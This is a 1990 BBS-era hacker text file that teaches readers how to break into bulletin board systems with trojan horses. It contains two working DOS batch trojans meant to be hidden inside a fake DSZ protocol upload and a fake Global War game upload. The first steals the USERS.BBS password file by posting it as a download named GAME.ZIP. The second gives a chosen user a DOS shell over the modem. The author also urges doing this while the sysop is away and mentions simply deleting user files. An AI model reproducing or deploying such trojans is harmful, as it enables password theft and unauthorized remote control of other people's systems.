home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / misc / batdis.doc < prev    next >
Text File  |  1990-08-28  |  8KB  |  194 lines

  1.                   Computer Terror and Distruction
  2.                     Issue #1 - BBS Infiltration
  3.  
  4.                                         By the Chamelion
  5.  
  6.     This article starts of the first issue of Computer Terror and
  7. Distruction.  Each issue will deal with a particular area of
  8. computer distruction, dealing mostly with different ways to fuck
  9. over computers.
  10.  
  11.     After taking a look at some of the better phreak/hack BBS
  12. systems, I haven't been able to find any good material on BBS
  13. distruction.  Most of the information I have gathered is rather
  14. simple and outdated, and dealt mostly with hitting Control Break
  15. alot.   Well, as most BBS systems are no longer written is basic,
  16. this is a rather stupid thing to try doing.  (Although it still
  17. works on some lame BBS games).  One of the best methods of
  18. breaking into a BBS is uploading a trojan horse. The easiest
  19. language to create a trojan is in batch language.  However, the
  20. sysop can easily view the program before he runs it, and thus the
  21. trojan is discovered.  However, using a new program called
  22. BAT2EXEC, you can convert your trojan batch file to a COM file,
  23. which is harder to read.
  24.  
  25. (Note: If BAT2EXEC.COM isn't in the archive file, it was created by
  26. Pc.Magazine and can be found on many sharewars BBS's)
  27.  
  28.     To compile a batch file edit the batch file with edlin then type
  29. in BAT2EXEC.COM, followed by the batch file.  It will convert the
  30. file to COM format.  This is nice for speeding up large batch
  31. files, etc. But, there is another important reason which makes
  32. this program useful.  Let's say that there is this lamer BBS is
  33. your area, and you want to mess with the BBS. Here, you have two
  34. choices.  You can steal the USERS.BBS listing, which includes all
  35. users and their passwords.  Or, you can set up his BBS so you can
  36. shell to his DOS to do whatever you want. What you want to do is
  37. setup a Trojan Horse on the system to do whatever you want.  The
  38. best way to do this is to give the sysop software that he is
  39. likely to use.  Secretly you booby-trap it to do what you want.
  40.  
  41.     Ok, the next section deals with how to steal the USERS.BBS
  42. listing, which includes all user names and passwords.  The second
  43. section is all about how to get access to the systems DOS via
  44. modem.  I'd read the first section, as it includes lots of
  45. information you need to know.
  46.  
  47. SECTION #1  - How to get a copy of the user file.
  48.  
  49.     First, get the docs for the type of software the target BBS
  50. operates with, and find out the name of listing.  USERS.BBS works
  51. for Remote Access, but Pcboard, etc use different names.  Now,
  52. get some utility or game that the BBS sysop is sure to run on his
  53. system. Now, look at the files that are included in the utility
  54. (or game).
  55.  
  56. For example, DSZ includes-
  57.  
  58. DSZ.DOC
  59. DSZ.EXE
  60.  
  61. and a bunch of other shit.  So, first rename DSZ.EXE DSZ.DAT. 
  62. Then, using EDLIN (For some reason, you need to use EDLIN for it
  63. to work with BAT2EXEC.  This is probably because in EDLIN you hit
  64. control C to end the text, and BAT2EXEC looks for this. So, you
  65. can type everything but the last two lines in a text editor, and
  66. finish it off with EDLIN, using CONTROL C to stop entering text.)
  67.  
  68. Now, make a batch file called DSZ.BAT.  It should look something
  69. like this.
  70.  
  71. @ECHO OFF
  72. IF EXIST C:\RA\USERS.BBS GOTO COPY
  73. REM Checks to see if the USERS.BBS listing is there.
  74. GOTO DSZ
  75. :COPY
  76. IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ
  77. REM Sets it to only copy once.
  78. REM Now we want to copy the USERS.BBS listing to the new file
  79. REN directory, under the name of GAME.ZIP
  80. COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP
  81. REM DMP.DMP is used to redirect the screen output
  82. REM Now is the tricky part.  You need to have FILES.BBS listing 
  83. REM add TOOBIN1.ZIP to it's listing of on-line files.
  84. COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS                      
  85. D:\FILES\UPLOAD\FILES.BAK > DMP.DMP
  86. REM D:\files\upload will change depending on the sub-dir setup.
  87. REM DSZ.DMP, a file you will need to make, is appended to        
  88. REM a listing of all available files.
  89. COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP
  90. DEL DMP.DMP
  91. :DSZ
  92. REM Now we want to run DSZ like normal.
  93. REN DSZ.DAT DZ.EXE
  94. REM Turn back on monitor
  95. DSZ %1 %2 %3 %4 %5 %6 %7
  96. REN DZ.EXE DSZ.DAT
  97. REM All done!
  98. Now, run BAT2EXEC DSZ.BAT, to create DSZ.COM
  99.  
  100.     Ok, remember how i said you need to add USERS.BBS (which was
  101. renamed game.zip) to the FILES.BBS listing?  Ok, now create a
  102. file that is called DSZ.DMP, and that looks like this.
  103.  
  104. GAME.ZIP  Game Disk #1, cracked by INC!
  105.           (Description should start on 14th line)
  106.  
  107.    Now I will recap what will happen when you have everything
  108. setup. The sysop sees that someone (You) has uploaded the newest
  109. version of DSZ Z-Modem, so he installs it.  The files he places
  110. in his protocol directory are:
  111.  
  112. DSZ.COM -Your batch file changed into COM.
  113. DSZ.DAT -The real DSZ
  114. DSZ.DOC -Docs to DSZ
  115. DSZ.DMP -Has text that says "game.zip"
  116.  
  117.     Now, he gets his BBS software to run DSZ.COM, which he thinks is
  118. DSZ. Because it's a com file, he can't tell what it does, which
  119. is the whole reason for using BAT2EXEC.COM anyway.  There is no
  120. way he can tell what DSZ.COM does. DSZ.COM runs, and copies
  121. USERS.BBS listing to the new files listing under the name
  122. GAME.ZIP.  Then, DSZ.DMP is added to the Files.BBS listing, so
  123. when you do a listing of new files, it will be there.  Then
  124. DSZ.DAT is renamed to DZ.EXE.  DZ.EXE is then run.  Then DZ.EXE 
  125. is renamed back to DSZ.DAT.  Now, all you have to do is download
  126. GAME.ZIP, and you are off!
  127.  
  128. Of course, it is even easier to delete Users.BBS, but that's not
  129. as much phun.
  130.  
  131.  
  132. Section 2-
  133.  
  134.     Ok, now let's say you want to shell to the BBS system's DOS,
  135. instead of copying the user listing.  Do this when the sysop is
  136. out of town, etc, so he doesn't show up and see what you are
  137. doing.  This time, the example uses Global War, a popular BBS
  138. game.
  139.  
  140. Rename Gwar.exe GW.DAT
  141.  
  142. @ECHO OFF
  143. IF %5==JACK GOTO FIRST
  144. IF %5==jack goto first
  145. REM Replace Jack with your first name
  146. GOTO RUN
  147. :first
  148. IF %6==RIPPER GOTO LAST
  149. if %6==ripper GOTO LAST
  150. REM Replace Ripper with your last name
  151. GOTO RUN
  152. :LAST
  153. CTTY COM1
  154. REM Choose the com port that the BBS uses!
  155. c:\command.com
  156. REM Just type "Exit" to end the shell
  157. goto end
  158. :run
  159. ren gw.dat gw.exe
  160. gw.exe %1 %2 %3 %4 %5 %6 %7
  161. ren gw.exe gw.dat
  162. :END
  163.  
  164.     Now, when you give the sysop the file, and he installs it,
  165. whenever you try to run GWAR, you will be placed in a DOS shell! 
  166. just remember several things. Don't try to directly import any of
  167. these files.  You will need to make modifications, depending on
  168. the BBS type, and several other parameters. For example, Gwar is
  169. not always run from the command line, and may search a file for
  170. the user name.  It is important that no one is around when you do
  171. this. It's a good idea to mess around as much as possible before
  172. you upload something.
  173.  
  174.     Also, when you are in that DOS shell, don't run any graphic
  175. applications. The best way to do it is to upload a simple gateway
  176. program like PC Anywhere. Once you are in DOS, go unzip it and
  177. then run it.  The best thing to do is be completely origional in
  178. your style of creating trojan horses, always use a bogus name or
  179. alias.
  180.  
  181. BTW, I can be reached via bitnet at
  182.                                          chamelio@hiway.scol.pa.us
  183.                                          ...psuvax1!psuecl!hiway!chamelio
  184.                                          ...psuvax1!hogbbs!hiway!chamelio
  185. Or on Lost Dungeon 1 gig!  (212)
  186.  
  187. (I do not accept any responsabilty for what you may do (or have
  188. done to you) with this information.  Use at your own risk)
  189.  
  190. Greets go out to Electric Monk, The Pope, and Zolten Coldia, and Road
  191. Master.
  192.  
  193. EGBT is comming to a computer near you!
  194.